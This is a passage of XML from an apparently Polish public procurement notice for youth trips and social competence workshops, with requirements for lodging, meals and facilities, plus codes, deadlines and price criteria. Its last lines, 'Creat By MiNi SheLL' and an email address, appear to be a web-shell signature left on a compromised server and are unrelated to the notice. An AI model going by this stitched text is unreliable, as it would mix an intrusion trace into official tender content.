•	łazienki ( damskie i męskie )  w budynku, w którym zakwaterowana będzie młodzież,  umywalki, natryski, WC, ciepłą i zimną wodę bez ograniczeń dla grupy 25 osobowej dziewcząt i chłopców oraz 1 opiekuna ze strony zamawiającego,
•	całodobowe wyżywienie dla 25 osobowej grupy ( minimum trzy posiłki: śniadanie, obiad, kolacja) posiłki powinny być podane w sposób estetyczny, spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia,  
•	w czasie pobytu młodzieży w punktach gastronomicznych na terenie całego obiektu nie będzie sprzedawany alkohol,
•	wydzielone miejsce na ognisko wraz z terenem zielonym wokół obiektu umożliwiającym zajęcia na świeżym powietrzu ( np. wiata, altana itp. ), boisko do piłki  siatkowej, miejsce do gry w piłkę nożną,  sprzęt sportowy ( piłki itp. ) 
•	zapewnienie młodzieży miejsca do spędzania wolnego czasu w budynku (np: świetlica, sala kominkowa itp.),
•	dostęp do pomieszczenia z czajnikiem  w celu zrobienia kawy, herbaty w wolnym czasie,
•	możliwość użytkowania w ośrodku pomieszczeń kuchennych (np. aneks kuchenny z piekarnikiem w celu  – prowadzenie zajęć  warsztatowych z wykorzystaniem sprzętu kuchennego (  pieczenie chleba itp.),
•	umożliwi każdorazowo udział w warsztatach 1 osoby ze strony Zamawiającego, któremu zapewni nocleg i wyżywienie.
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>55270000-3</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/10/2018</data_kon><kryt_cena></kryt_cena><kryt_1>cena</kryt_1><kryt_1p>60</kryt_1p></cz_0><cz_1><nr_czesci>2</nr_czesci><nazwa>Zorgaizowanie i przeprowadzenie warsztatów w ramach Treningu Kompetencji Społecznych</nazwa><opis>REALIZACJA Warsztatów Treningu Kompetencji Społecznych w ramach 15 wyjazdów x 3 dni  x 1 klasa x 25 os. (łącznie 375 osób) dla klas I w ośrodku specjalizującym się w innowacyjnych, aktywnych metodach pracy nad kompetencjami społecznymi,  zajęcia będą odbywać się w  trzech podgrupach, do 10 osób każda podgrupa, łącznie 1080 h warsztatów ( 1 klasa x 3 podgrupy x 3 dni  x 8 h x 15 wyjazdów) dotyczyć między innymi komunikacji, współpracy w grupie, radzenia sobie z emocjami i stresem, asertywności. Prowadzone warsztatowo: ćwiczenia, praca w grupie i parach, wystąpienia przed grupą.

Rok 2017 – w trakcie 10 wyjazdów x 3 dni x 1 klasa x 25 osób (łącznie 250 osób) łącznie 720 godzin warsztatów
Rok 2018 – w trakcie 5 wyjazdów x 3 dni x 1 klasa x 25 osób (łącznie 125 osób) łącznie 360 godzin warsztatów


Wykonawca w ramach zamówienia zobowiązany będzie zapewnić:



•	wykwalifikowaną opiekę podczas pobytu młodzieży na wyjazdowych warsztatach dla grupy 25 osobowej  w trakcie zajęć warsztatowych  ( instruktorzy min. 3 osoby – 1 instruktor będzie miał pod opieką jedną podgrupę liczącą 8-9 osób każda.
•	Prowadzić listę obecności uczestników warsztatów, oznakowaną zgodnie z zasadami dotyczącymi promocji projektów współfinansowanych z Europejskiego Funduszu Społecznego.
•	Umożliwić każdorazowo udział w warsztatach 1 osoby ze strony Zamawiającego.
•	Wykonawca zobowiązany jest dołączyć do oferty proponowany program zajęć warsztatowych wraz z opisem proponowanych innowacyjnych form oraz harmonogram zajęć dla grupy 25 osobowej z uwzględnieniem 3 podgrup 8-9 osobowej.
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>80570000-0</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/10/2018</data_kon><kryt_cena></kryt_cena><kryt_1>cena</kryt_1><kryt_1p>60</kryt_1p></cz_1></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com